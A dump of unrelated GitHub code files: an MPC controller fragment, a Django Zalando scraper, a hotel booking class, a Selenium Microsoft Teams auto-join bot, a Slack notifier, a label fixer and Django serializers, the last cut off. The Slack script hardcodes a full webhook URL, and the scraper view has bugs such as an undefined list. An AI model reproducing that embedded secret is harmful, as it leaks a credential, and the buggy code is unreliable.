pee_ref: np.ndarray, u_ref: np.array) -> None:\n yref = np.vstack((x_ref, u_ref, pee_ref)).flatten()\n yref_e = np.vstack((x_ref, pee_ref)).flatten()\n for stage in range(self.options.n):\n self.acados_ocp_solver.cost_set(stage, \"yref\", yref) \n self.acados_ocp_solver.cost_set(self.options.n, \"yref\", yref_e)\n \n def compute_torques(self, q: np.ndarray, dq: np.ndarray, t:float = None) -> np.ndarray:\n \n # set initial state\n xcurrent = np.vstack((q, dq))\n self.acados_ocp_solver.set(0, \"lbx\", xcurrent)\n self.acados_ocp_solver.set(0, \"ubx\", xcurrent)\n\n # solve the OCP\n status = self.acados_ocp_solver.solve()\n \n self.debug_time.append(self.acados_ocp_solver.get_stats(\"time_tot\")[0])\n if status != 0 and status != 2:\n u = np.zeros((self.nu,))\n print(\"no optimal solution\")\n # raise RuntimeError('acados returned status {} in time step {}.'.format(status, self.iteration_conuter))\n \n else: \n # get solution\n u = self.acados_ocp_solver.get(0, \"u\")\n \n 
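# receding-horizon control: only the stage-0 input of the optimal sequence is applied; the rest of the horizon is recomputed on the next cycle\n 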
self.iteration_conuter += 1\n \n return u\n \n ","repo_name":"wenxin0917/Imitation-Learning-of-MPC-for-LBR-iiwa-14","sub_path":"mpc_controller/mpc.py","file_name":"mpc.py","file_ext":"py","file_size_in_byte":10765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25990328530","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\n\nimport requests\nimport urllib.request\nimport time\nfrom bs4 import BeautifulSoup\nimport random\n\nfrom scraper.models import Recherche\nfrom scraper.models import Articles\n\ndef saveArticle(a_desc,a_titre,aprix,acouleur,tail,a_id,key, url, aimg):\n\n\ttry:\n\t\tis_article = Articles.objects.get(aliens=a_id)\n\texcept Articles.DoesNotExist:\n\t\tis_article = 0\n\n\tif is_article != 0:\n\t\t\n\t\t# Modifier\n\t\tis_article.emarque = a_desc\n\t\tis_article.adescription = a_titre\n\t\tis_article.aprix = aprix\n\t\tis_article.acouleur = 'Red Black'\n\t\tis_article.atail = '30 35 38'\n\t\tis_article.aliens=a_id\n\t\tis_article.acles=key \n\t\tis_article.asource=url\n\t\tis_article.aimg=aimg\n\t\t# Enregistrer\n\t\tis_article.save()\n\n\telse:\n\n\t\t# Ajouter\n\t\tarticles = Articles(emarque=a_desc,adescription=a_titre,aprix=aprix,acouleur='Bleu Red',atail='M XL',aliens=a_id,acles=key, asource=url, aimg=aimg)\n\t\t# Enregistrer\n\t\tarticles.save()\n\n\ndef getData(key):\n\turl = 'https://www.zalando.fr/homme/?q='+key+'&p=94'\n\theaders={'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'}\n\tresponse = requests.get(url, headers=headers)\n\tif response.status_code == 200:\n\t\t\n\t\tsoup = BeautifulSoup(response.text, \"html.parser\")\n\t\t\n\t\tquotes =[] # a list to store quotes \n\t\ttry:\n\n\t\t\ttable = soup.find('z-grid', attrs = {'class':'cat_catArticles-2Pxh7'}) \n\t\t\tcompt = 1\n\t\t\tfor row in table.findAll('z-grid-item', attrs = {'class':'cat_articleCard-1r8nF cat_normalWidth-tz8JR'}): \n\t\t\t\tquote = {} \n\t\t\t\t\n\t\t\t\ta_url = 'http://127.0.0.1:8000/detail'+row.a['href'].replace('.html', '')\n\t\t\t\tquote['url'] = a_url\n\t\t\t\t\t\n\t\t\t\ta_img = row.img['src'] \n\t\t\t\tquote['img'] = a_img\n\n\t\t\t\ta_id = row.a['href'].replace('.html', '')\n\t\t\t\tquote['id'] = a_id\n\n\t\t\t\ta_desc = row.find('div', attrs = {'class':'cat_articleName--arFp cat_ellipsis-MujnT'}).get_text() \n\t\t\t\tquote['desc'] = a_desc\n\n\n\t\t\t\tprix = row.find('div', attrs = {'class':'cat_prices-2-Zhx'}).text.split(',')\n\t\t\t\t\n\n\t\t\t\ta_titre = row.find('div', attrs = {'class':'cat_brandName-2XZRz cat_ellipsis-MujnT'}).text\n\t\t\t\tquote['titre'] = a_titre\n\t\t\t\t\n\t\t\t\tif prix[0].isdigit() :\n\t\t\t\t\tquote['prix'] = nanPrix(prix[0])\n\t\t\t\t\tquotes.append(quote)\n\t\t\t\t\tsaveArticle(a_desc,a_titre,nanPrix(prix[0]),'Bleu Red','M XL',a_id,key,url,a_img) \n\t\t\t\t\t\n\t\t\t\tcompt += 1\n\n\t\t\trecherche = Recherche(rmot=key, rsite='https://www.zalando.fr/homme/')\n\t\t\trecherche.save()\n\t\t\treturn quotes\n\t\texcept:\n\t\t\tall_articles = Articles.objects.filter(acles__contains=key)\n\t\t\tfor articles in all_articles:\n\n\t\t\t\tquote = {} \n\t\t\t\tquote['prix'] = articles.aprix\n\t\t\t\tquote['url'] = articles.aliens\n\t\t\t\tquote['img'] = articles.aimg\n\t\t\t\tquote['id'] = articles.aliens\n\t\t\t\tquote['desc'] = articles.emarque\n\t\t\t\tquote['titre'] = articles.adescription\n\t\t\t\tquotes.append(quote)\n\n\t\t\trecherche = Recherche(rmot=key, 
rsite='https://www.zalando.fr/homme/')\n\t\t\trecherche.save()\n\t\t\treturn quotes\n\n\telse:\n\n\t\treturn quotes\n\n\ndef getDetail(url):\n\t\n\tr = requests.get(url)\n\tc = r.content.decode('utf-8')\n\tsoup = BeautifulSoup(c,\"html.parser\")\n\n\treturn soup\n\n\t\n\n\n\ndef home(req):\n\tmot = 'chemises'\n\tfoo = ['Sneakers', 'Chemises', 'Costumes', 'Skate shoes', 'Derbies & Richelieu', 'Baskets']\n\tmotchoix = random.choice(foo)\n\tquotes = getData(motchoix)\n\treturn render(req, 'home-page.html', {'liens':quotes})\n\n\ndef detail(req, liens):\n\tkeis = liens\n\tquote = []\n\tliens = 'https://www.zalando.fr/'+liens+'.html'\n\ttry:\n\n\t\tdonnes = getDetail(liens)\n\t\timgc = donnes.find('img',attrs={\"id\":\"galleryImage-0\"})\n\t\timg = imgc['src']\n\n\t\ttitre = donnes.find('h2',attrs={\"class\":\"h-text h-color-black detail h-p-bottom-xs h-bold\"}).text\n\t\tdesc = donnes.find('h1',attrs={\"class\":\"h-text h-color-black title-typo h-clamp-2\"}).text\n\t\trecprix = donnes.find('div',attrs={\"class\":\"h-text h-color-black title-typo h-p-top-m\"}).text.split(',')\n\t\tprix = (int(recprix[0]) + 1) * 650 \n\n\t\tquote = {} \n\t\tquote['recprix'] = prix\n\t\tquote['url'] = liens\n\t\tquote['img'] = img\n\t\tquote['key'] = keis\n\t\tquote['desc'] = desc\n\t\tquote['titre'] = titre\n\t\tquotes.append(quote)\n\n\texcept:\n\t\ttry:\n\t\t\tarticles = Articles.objects.get(aliens=keis)\n\t\t\tquote = {}\n\t\t\tquote['url'] = articles.aliens\n\t\t\tquote['recprix'] = articles.aprix\n\t\t\tquote['img'] = articles.aimg\n\t\t\tquote['key'] = articles.aliens\n\t\t\tquote['desc'] = articles.emarque\n\t\t\tquote['titre'] = articles.adescription\n\t\t\tquotes.append(quote)\n\t\texcept Articles.DoesNotExist:\n\t\t\tquote = {}\n\treturn render(req, 'pages/product-page.html', {'detail':quotes})\n\t\ndef checkout(req):\n\treturn render(req, 'pages/checkout-page.html')\n\n\n\ndef result(req):\n\n\tq = req.GET.get('q')\n\tif (q):\n\t\tmessage = getData(q)\n\telse:\n\t\tmessage = 'costumes'\n\n\t\n\treturn render(req, 'pages/result-page.html', {'resultats':message})\n\n\n\n\ndef about(req):\n\treturn render(req, 'pages/about.html')\n\n\ndef contact(req):\n\treturn render(req, 'pages/contact.html')\n\n\ndef nanPrix(prix_euro):\n\ttaux = 50\n\tpct = 100\n\tapli_taux = 1\n\n\ttaux_cfa = 656\n\n\tmontaux = apli_taux + (taux/pct)\n\n\tprix_fin = (prix_euro * taux_cfa) * montaux\n\n\treturn prix_fin","repo_name":"Soro08/ecommerce","sub_path":"ecommerce/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"32898113937","text":"from typing import List,IO, Union\nfrom Keycard import Keycard\nfrom Room import Room\nfrom Guest import Guest\nfrom GuestRecord import GuestRecord\nfrom ErrorCase import CannotBook, CannotBookAllFloor, CannotCheckout, FloorNotFound, GuestNotFound, KeycardNotAssign, KeycardNotFound, NoKeycardAvailable, RoomNotFound, WrongSymbol\n\nclass Hotel:\n \n def __init__(self, floor_count: int, room_count_per_floor: int) -> None: \n self.create_rooms(floor_count, room_count_per_floor)\n self.create_keycards(floor_count, room_count_per_floor) \n self.guest_records = []\n\n def __generate_room_numbers(self, floor_count: int, room_count_per_floor: int) -> List[int]:\n temp_room_numbers = list(range(1, room_count_per_floor + 1))\n floor_numbers = list(range(1, floor_count + 1))\n room_numbers = [room_number + (floor_number * 100) for room_number in temp_room_numbers for 
floor_number in floor_numbers]\n \n return room_numbers\n\n def __generate_keycard_numbers(self, floor_count: int, room_count_per_floor: int) -> List[int]:\n keycard_count = floor_count * room_count_per_floor\n keycard_numbers = list(range(1, keycard_count + 1))\n\n return keycard_numbers\n\n def create_keycards(self, floor_count: int, room_count_per_floor: int) -> None:\n keycard_numbers = self.__generate_keycard_numbers(floor_count, room_count_per_floor)\n self.keycards = list(map(lambda keycard_number: Keycard(str(keycard_number)), keycard_numbers)) \n\n def create_rooms(self, floor_count: int, room_count_per_floor: int) -> None:\n room_numbers = self.__generate_room_numbers(floor_count, room_count_per_floor)\n self.rooms = list(map(lambda room_number: Room(str(room_number // 100), str(room_number)), room_numbers))\n\n def get_keycard_by_keycard_number(self, keycard_number: str) -> Keycard:\n keycards = list(filter(lambda keycard: keycard.number == keycard_number, self.keycards))\n \n if(not keycards):\n raise KeycardNotFound(keycard_number)\n\n return keycards[0]\n \n def get_available_keycard(self) -> Keycard:\n used_keycards = list(map(lambda record: record.keycard, self.guest_records))\n available_keycards = list(filter(lambda keycard: keycard not in used_keycards, self.keycards))\n \n if(not available_keycards):\n raise NoKeycardAvailable()\n\n return available_keycards[0]\n\n def get_room_by_room_number(self, room_number: str) -> Room: \n rooms = list(filter(lambda room: room.number == room_number, self.rooms))\n \n if(not rooms):\n raise RoomNotFound(room_number)\n \n return rooms[0]\n\n def get_guest_by_room_number(self, room_number: str) -> Guest:\n room = self.get_room_by_room_number(room_number)\n guest_records = list(filter(lambda record: record.room == room, self.guest_records))\n \n if(not guest_records):\n raise GuestNotFound(room_number)\n \n return guest_records[0].guest\n \n def get_guest_record_by_room_number(self, room_number: str) -> Union[GuestRecord, None]:\n room = self.get_room_by_room_number(room_number)\n guest_records = list(filter(lambda record: record.room == room, self.guest_records))\n \n if(not guest_records):\n return None\n \n return guest_records[0]\n\n def get_guest_record_by_keycard_number(self, keycard_number: str) -> Union[GuestRecord, None]:\n keycard = self.get_keycard_by_keycard_number(keycard_number)\n guest_records = list(filter(lambda record: record.keycard == keycard, self.guest_records)) \n \n if(not guest_records):\n return None\n \n return guest_records[0]\n\n def list_room_by_floor_number(self, floor_number: str) -> List[Room]:\n rooms = list(filter(lambda room: room.floor_number == floor_number, self.rooms))\n \n if(not rooms):\n raise FloorNotFound(floor_number)\n \n return rooms\n\n def book(self, room_number: str, guest: Guest) -> GuestRecord:\n guest_record = self.get_guest_record_by_room_number(room_number)\n \n if(guest_record): \n raise CannotBook(room_number, guest, guest_record)\n \n room = self.get_room_by_room_number(room_number)\n keycard = self.get_available_keycard()\n new_guest_record = GuestRecord(guest, room, keycard)\n self.guest_records.append(new_guest_record)\n \n return new_guest_record\n \n def list_available_room(self) -> List[Room]: \n booked_rooms = list(map(lambda record: record.room, self.guest_records))\n available_rooms = list(filter(lambda room: room not in booked_rooms, self.rooms))\n\n return available_rooms\n\n def checkout(self, keycard_number: str, guest_name: str) -> GuestRecord:\n guest_record = 
self.get_guest_record_by_keycard_number(keycard_number)\n \n if(not guest_record):\n raise KeycardNotAssign()\n\n if(guest_record.guest.name != guest_name):\n raise CannotCheckout(guest_record, keycard_number)\n \n self.guest_records.remove(guest_record)\n\n return guest_record\n\n def list_guest(self) -> List[Guest]:\n return list(map(lambda record: record.guest, self.guest_records))\n \n def list_guest_by_age(self, comparison_symbol: str, age: int) -> List[Guest]:\n if(comparison_symbol == '<'):\n guest_records = list(filter(lambda record: record.guest.age < age, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n\n elif(comparison_symbol == '>'):\n guest_records = list(filter(lambda record: record.guest.age > age, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n \n elif(comparison_symbol == '>='):\n guest_records = list(filter(lambda record: record.guest.age >= age, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n \n elif(comparison_symbol == '<='):\n guest_records = list(filter(lambda record: record.guest.age <= age, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n \n elif(comparison_symbol == '!='):\n guest_records = list(filter(lambda record: record.guest.age != age, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n \n elif(comparison_symbol == '='):\n guest_records = list(filter(lambda record: record.guest.age == age, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n else:\n raise WrongSymbol()\n\n return guests\n\n def list_guest_by_floor_number(self, floor_number: str) -> List[Guest]:\n rooms = self.list_room_by_floor_number(floor_number)\n guest_records = list(filter(lambda record: record.room in rooms, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n\n return guests\n\n def checkout_by_floor_number(self, floor_number: str) -> List[GuestRecord]:\n rooms = self.list_room_by_floor_number(floor_number)\n guest_records = list(filter(lambda record: record.room in rooms, self.guest_records))\n checkouted_guest_records = list(map(lambda record: self.checkout(record.keycard.number, record.guest.name), guest_records))\n\n return checkouted_guest_records\n\n def book_by_floor_number(self, floor_number: str, guest: Guest) -> List[GuestRecord]:\n rooms = self.list_room_by_floor_number(floor_number)\n guest_records = list(filter(lambda record: record.room in rooms, self.guest_records))\n \n if(guest_records):\n raise CannotBookAllFloor(floor_number, guest)\n\n new_guest_records = list(map(lambda room: self.book(room.number, guest), rooms))\n \n return new_guest_records\n","repo_name":"DotDot-011/aqoda_learning","sub_path":"Hotel.py","file_name":"Hotel.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74553936362","text":"import json\nimport time\nimport datetime\n\nimport selenium\nfrom selenium import webdriver\nfrom selenium.webdriver import ChromeOptions, Chrome\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By \nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC \nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\nclass Teams:\n def __init__(self):\n\n self.opts = ChromeOptions()\n 
self.opts.add_experimental_option(\"detach\", True)\n self.opts.add_argument('--ignore-certificate-errors')\n self.opts.add_argument('--ignore-ssl-errors')\n self.opts.add_argument(\"--use-fake-ui-for-media-stream\")\n\n self.browser = Chrome( executable_path='Chrome-Driver/V83/chromedriver' ,chrome_options=self.opts)\n\n self.link = 'https://www.microsoft.com/en-in/microsoft-365/microsoft-teams/group-chat-software'\n self.x = 1600\n self.y = 1600\n\n self.sign_in = 'mectrl_main_trigger'\n self.login_id = 'i0116'\n self.password_id = 'i0118'\n self.btn_class = 'inline-block'\n self.popup_id = 'use-app-lnk'\n self.team_name_id = 'team-name-text'\n self.meeting_class = 'ts-sym ts-btn ts-btn-primary inset-border icons-call-jump-in ts-calling-join-button app-title-bar-button app-icons-fill-hover call-jump-in'\n\n\n def start_window(self):\n\n\n self.browser.set_window_size(self.x , self.y)\n self.browser.get(self.link)\n \n login_href = WebDriverWait(self.browser, 10).until(\n EC.presence_of_element_located((By.ID, self.sign_in))\n )\n\n login_href.click()\n\n\n def add_credentials(self):\n with open('assets/credentials.json') as json_data:\n credentials = json.load(json_data)\n\n email_field = WebDriverWait(self.browser, 10).until(\n EC.presence_of_element_located((By.ID, self.login_id))\n )\n email_field.send_keys(credentials['email'] , Keys.ENTER)\n time.sleep(10)\n password_field = WebDriverWait(self.browser, 10).until(\n EC.presence_of_element_located((By.ID, self.password_id))\n )\n password_field.send_keys(credentials['password'])\n\n time.sleep(5)\n submit_btn = self.browser.find_element_by_class_name(self.btn_class).click()\n\n\n def popup_login(self):\n\n submit_btn = self.browser.find_element_by_class_name(self.btn_class)\n submit_btn.click()\n\n\n def popup_ad(self):\n\n web_app_btn = self.browser.find_element_by_class_name(self.popup_id)\n web_app_btn.click()\n\n def join_group(self , class_name):\n \n all_user_groups = WebDriverWait(self.browser, 20).until(\n EC.presence_of_element_located((By.CLASS_NAME, self.team_name_id))\n )\n all_user_groups = self.browser.find_elements_by_class_name(self.team_name_id)\n\n for group in range(0 ,len(all_user_groups)):\n if all_user_groups[group].text.lower() == class_name.lower():\n all_user_groups[group].click()\n break\n \n\n def mute_audio(self):\n \n audio_btn = self.browser.find_element_by_css_selector(\"toggle-button[data-tid='toggle-mute']>div>button\")\n audio_is_on = audio_btn.get_attribute(\"aria-pressed\")\n if audio_is_on == \"true\":\n audio_btn.click()\n\n def close_video(self):\n \n video_btn = self.browser.find_element_by_css_selector(\"toggle-button[data-tid='toggle-video']>div>button\")\n video_is_on = video_btn.get_attribute(\"aria-pressed\")\n if video_is_on == \"true\":\n video_btn.click()\n\n\n def join_meeting(self):\n\n time.sleep(20)\n\n try:\n meeting_button = WebDriverWait(self.browser, 30).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR,\"button[ng-click='ctrl.joinCall()']\"))\n )\n except selenium.common.exceptions.TimeoutException:\n print(\"Couldn't load the link or Maybe meeting has not been started yet .\")\n \n else:\n time.sleep(20)\n\n meeting_button.click()\n\n time.sleep(20)\n\n self.mute_audio()\n self.close_video()\n\n join_button = WebDriverWait(self.browser, 30).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR,\"div.flex-fill.input-section > div > div > button\"))\n )\n\n join_button.click()\n\n #click form needs modification\n # def click_form(self):\n # form_btn = 
WebDriverWait(self.browser, 40).until(\n        #         EC.presence_of_element_located((By.CSS_SELECTOR,\" div > div > label:nth-child(1)\"))\n        #     )\t\n        #     time.sleep(10)\n        #     form_btn.click()\n        #     vote_sub=WebDriverWait(self.browser, 40).until(\n        #         EC.presence_of_element_located((By.CSS_SELECTOR,\" div.card-body > div > div:nth-child(5) > div:nth-child(1) > div > button\"))\n        #     )\n        #     vote_sub.click()\n    \n    def min_window(self):\n    \tWebDriverWait(self.browser, 20).until(\n            EC.element_to_be_clickable((By.CSS_SELECTOR, '#app-bar-2a84919f-59d8-4441-a975-2a8c2643b741'))\n        ).click()\n\n    # def get_time(self):\n    \t\n    # \ttime =WebDriverWait(self.browser, 30).until(\n    #             EC.presence_of_element_located((By.CSS_SELECTOR,\"calling-duration > span\"))\n    #         )\n    # \tcurr_time=time.text()\n\n    def getchats(self):\n        \n        chats=[]\n        for chat in self.browser.find_elements_by_css_selector('message-list > div > virtual-repeat > div'):\t\n            message = chat.find_element_by_css_selector(\"#messageBody > div:nth-child(2) > see-more > div > div > div\").get_attribute('innerHTML')\n            obj = json.dumps({'message': message})\n            chats.append(json.loads(obj))\n        \n        print(chats)\n\n    \n\n    def hang_call(self):\n        hangup_btn = WebDriverWait(self.browser, 30).until(\n            EC.presence_of_element_located((By.CSS_SELECTOR,\"button[data-tid='call-hangup']\"))\n        )\n        time.sleep(20)\n        hangup_btn.click()  \n    \n\n\n\n\ndef main():\n\n    t1 = Teams()\n\n    # with open('assets/agenda.json') as json_data:\n    #     agenda = json.load(json_data)\n    \n    t1.start_window()\n    t1.add_credentials()\n    t1.popup_login()\n    t1.popup_ad()\n    t1.join_group('own') # For example\n    t1.join_meeting()\n    t1.min_window()\n    t1.getchats()\n    # t1.click_form()\n\n    t1.hang_call()\n    \n\nif __name__ == \"__main__\":\n    main()\n\n#es-bottom-overlay","repo_name":"aryanshridhar/MS-Teams-Automation","sub_path":"automate.py","file_name":"automate.py","file_ext":"py","file_size_in_byte":6530,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"11918147578","text":"def solution(n, stairs):\n    solutions = [(stairs[0], -1)] # (best sum reachable at this stair, index of the previous stair taken)\n\n    if stairs[0] > 0:\n        solutions.append((stairs[0] + stairs[1], 0))\n    else:\n        solutions.append((stairs[1], -1))\n\n    for i in range(2, len(stairs)):\n        if solutions[i - 1][0] > solutions[i - 2][0]:\n            solutions.append((solutions[i - 1][0] + stairs[i], i - 1))\n        else:\n            solutions.append((solutions[i - 2][0] + stairs[i], i - 2))\n\n    result_sum = solutions[-1][0]\n    current_step = solutions[-1][1]\n    steps = [n - 1]\n    while current_step != -1:\n        steps.append(current_step)\n        current_step = solutions[current_step][1]\n\n    steps.reverse()\n\n    return result_sum, steps\n\n\nn = int(input())\nstairs = [int(x) for x in input().split()]\n\ntotal, steps = solution(n, stairs)\nprint(total)\nprint(' '.join(map(lambda x: str(x + 1), steps)))\n\n","repo_name":"obabichev/acmp-py","sub_path":"acmp/dynamic/329.py","file_name":"329.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"36760200832","text":"def send_message_to_slack(text):\n    from urllib import request, parse\n    import json\n\n    post = {\"text\": \"{0}\".format(text)}\n\n    try:\n        json_data = json.dumps(post)\n        req = request.Request(\"https://hooks.slack.com/services/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\",\n                              data=json_data.encode('ascii'),\n                              headers={'Content-Type': 'application/json'})\n        resp = request.urlopen(req)\n    except Exception as em:\n        print(\"EXCEPTION: \" + 
str(em))\n\nsend_message_to_slack('Docker Pipeline is completed...................')","repo_name":"kavya02703/petclinic","sub_path":"slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24154763822","text":"import os\npath = r'/home/kushaldulani/Finito/Dataset/Annotated/cinthol-labels-1/'\n\n\nfor ft in os.listdir(path):\n print(ft)\n f=open(path+ft,'r+')\n t=f.read()\n lst = t.split(\"\\n\")\n lst = list(filter(None,lst))\n for i in range(len(lst)):\n p_list = lst[i].split()\n el =p_list[0]\n if el==\"6\":\n p_list[0] =\"1\"\n lst[i] = \" \".join(p_list) \n new =\"\\n\".join(lst) \n f.close()\n f=open(path+ft,\"w+\")\n f.write(new)\n f.close()\n","repo_name":"kushu9999/All-Scripts","sub_path":"yolo-index-changer.py","file_name":"yolo-index-changer.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23670504806","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\nfrom EvaluateHub.serializers import IssueSerializer, ResponseSerializer, ClassRecordSerializer,MaterialSerializer, SecurityFactorsSerializer\nfrom EvaluateHub.models import *\nfrom EvaluateHub.utils import create_response_if_not_empty, update_response_if_not_empty\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nclass AdminStudentsAffairsSerializer(ModelSerializer):\n first_class = ClassRecordSerializer(read_only =True)\n second_class = ClassRecordSerializer(read_only =True)\n third_class = ClassRecordSerializer(read_only =True)\n fourth_class = ClassRecordSerializer(read_only =True)\n fifth_class = ClassRecordSerializer(read_only =True)\n sixth_class = ClassRecordSerializer(read_only =True)\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer()\n class Meta:\n model = StudentsAffairs\n fields = ['id','first_class','second_class','third_class','fourth_class','fifth_class','sixth_class','transfers_to_school','transfers_from_school','transferred_files', 'issue','response']\n read_only_fields = ['id','first_class', 'transfers_to_school', 'transfers_from_school', 'transferred_files']\n\n\nclass AdminSecuritySafetySerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n security_factors = SecurityFactorsSerializer(read_only =True)\n class Meta:\n model = SecuritySafety\n fields = ['id','labs','cabins', 'building','wall','external_factors','security_factors', 'issue','response']\n read_only_fields = ['id','labs','cabins', 'building','wall','external_factors','security_factors', 'issue']\n\nclass AdminTeachersSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n material_one = MaterialSerializer(read_only =True)\n material_two = MaterialSerializer(read_only =True)\n material_three = MaterialSerializer(read_only =True)\n material_four = MaterialSerializer(read_only =True)\n material_five = MaterialSerializer(read_only =True)\n material_six = MaterialSerializer(read_only =True)\n material_seven = MaterialSerializer(read_only =True)\n material_eight = MaterialSerializer(read_only =True)\n material_nine = MaterialSerializer(read_only =True)\n material_ten = MaterialSerializer(read_only =True)\n material_eleven = MaterialSerializer(read_only =True)\n material_twelve = MaterialSerializer(read_only =True)\n class Meta:\n model 
= Teachers\n        fields = ['material_one', 'material_two', 'material_three', 'material_four', 'material_five', 'material_six', 'material_seven', 'material_eight', 'material_nine', 'material_ten', 'material_eleven', 'material_twelve', 'issue', 'response'] \n\nclass AdminStrategicPlanningSerializer(ModelSerializer):\n    issue = IssueSerializer(read_only =True)\n    response = ResponseSerializer() \n    class Meta:\n        model = StrategicPlanning\n        fields = ['id', 'obstacles', 'plan_activation','team_building','plan','analysis','issue', 'response']\n        read_only_fields = ['id', 'obstacles', 'plan_activation','team_building','plan','analysis','issue']\n\nclass AdminAdministrationSerializer(ModelSerializer):\n    issue = IssueSerializer(read_only =True)\n    response = ResponseSerializer() \n    class Meta:\n        model = Administration\n        fields = ['id' ,'execution_plan','team_building','analysis','activities_activation','obstacles','predicted_crisis','communication_system','risks_indicators','plan','training_on_plan', 'issue', 'response']\n        read_only_fields = ['id' ,'execution_plan','team_building','analysis','activities_activation','obstacles','predicted_crisis','communication_system','risks_indicators','plan','training_on_plan', 'issue']\n\nclass AdminQualitySerializer(ModelSerializer):\n    issue = IssueSerializer(read_only =True)\n    response = ResponseSerializer() \n    class Meta:\n        model = Quality\n        fields = ['id','first_year_one', 'second_year_one', 'third_year_one', 'fourth_year_one', 'fifth_year_one', 'sixth_year_one', 'first_year_two', 'second_year_two', 'third_year_two', 'fourth_year_two', 'fifth_year_two', 'sixth_year_two', 'first_year_three', 'second_year_three', 'third_year_three', 'fourth_year_three', 'fifth_year_three', 'sixth_year_three', 'issue', 'response']\n        read_only_fields = ['id','first_year_one', 'second_year_one', 'third_year_one', 'fourth_year_one', 'fifth_year_one', 'sixth_year_one', 'first_year_two', 'second_year_two', 'third_year_two', 'fourth_year_two', 'fifth_year_two', 'sixth_year_two', 'first_year_three', 'second_year_three', 'third_year_three', 'fourth_year_three', 'fifth_year_three', 'sixth_year_three', 'issue']\n\nclass AdminWorkersAffairsSerializer(ModelSerializer):\n    issue = IssueSerializer(read_only =True)\n    response = ResponseSerializer() \n    class Meta:\n        model = WorkersAffairs\n        fields = ['id', 'registered', 'present','absent', 'negatives', 'issue', 'response']\n        read_only_fields = ['id', 'registered', 'present','absent', 'negatives', 'issue']\n\nclass AdminTrainingSerializer(ModelSerializer):\n    issue = IssueSerializer(read_only =True)\n    response = ResponseSerializer() \n    class Meta:\n        model = Training\n        fields = ['id', 'teachers_training', 'training_plan','training_plan_activation', 'issue', 'response']\n        read_only_fields = ['id', 'teachers_training', 'training_plan','training_plan_activation', 'issue']\n\nclass AdminNutritionSerializer(ModelSerializer):\n    issue = IssueSerializer(read_only =True)\n    response = ResponseSerializer() \n    class Meta:\n        model = Nutrition\n        fields = ['id', 'daily_received', 'daily_served','disciplined_distribution','health_certificate', 'not_stored_periods', 'issue', 'response']\n        read_only_fields = ['id', 'daily_received', 'daily_served','disciplined_distribution','health_certificate', 'not_stored_periods', 'issue']\n\nclass AdminDecentralizationSerializer(ModelSerializer):\n    issue = IssueSerializer(read_only =True)\n    response = ResponseSerializer() \n    class Meta:\n        model = Decentralization\n        fields = ['id', 'board_of_trustees', 
'decentralization_committee','settlement', 'exchange', 'plan' ,'append','issue', 'response']\n read_only_fields=['id', 'board_of_trustees', 'decentralization_committee','settlement', 'exchange', 'plan' ,'append','issue']\n\nclass AdminCooperativeSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = Cooperative\n fields = ['id','existing_authorized_items','drag_running' , 'drag_profits', 'issue', 'response' ]\n read_only_fields = ['id','existing_authorized_items','drag_running' , 'drag_profits', 'issue' ]\n\nclass AdminLaboratoriesSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = Laboratories\n fields = ['id', 'work_validity','ory_association','networks','computers','evaluation', 'tilo', 'issue', 'response']\n read_only_fields = ['id', 'work_validity','networks','computers','evaluation', 'tilo', 'issue']\n\nclass AdminProductionUnitSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = ProductionUnit\n fields = ['id', 'profit_distribution','supply','activation','certified','issue', 'response']\n read_only_fields = ['id', 'profit_distribution','supply','activation','certified','issue']\n\nclass AdminEnvironmentPopulationSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = EnvironmentPopulation\n fields = ['id', 'toilets_health_procedures','health_file','diagnosis_health_plan','check_health_plan','activities' ,'labs_health_procedures','issue', 'response']\n read_only_fields = ['id', 'toilets_health_procedures','health_file','diagnosis_health_plan','check_health_plan','activities' ,'labs_health_procedures','issue']\n\nclass AdminStudentsEvaluationFormSerializer(ModelSerializer):\n students_affairs = AdminStudentsAffairsSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','students_affairs']\n read_only_fields = ['id', 'school_name', 'school_id', 